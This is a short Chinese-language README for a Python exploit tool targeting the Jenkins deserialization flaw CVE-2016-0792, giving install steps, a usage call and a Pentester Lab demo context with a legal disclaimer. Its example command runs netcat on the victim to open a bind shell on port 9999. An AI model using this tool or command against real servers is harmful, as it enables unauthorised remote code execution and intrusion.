
Jenkins序列化漏洞利用工具 - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
requests 库是此利用工具所需的
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
其中 url 是 jenkins 服务器的 URL,command 是要执行的命令
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
这将在受害机器上运行 nc 并监听 9999 端口
为演示目的,我将运行来自 Pentester Lab 的 ISO
未经许可使用此软件攻击目标是非法的。对于因违法使用此软件造成的任何损害,我不承担任何责任。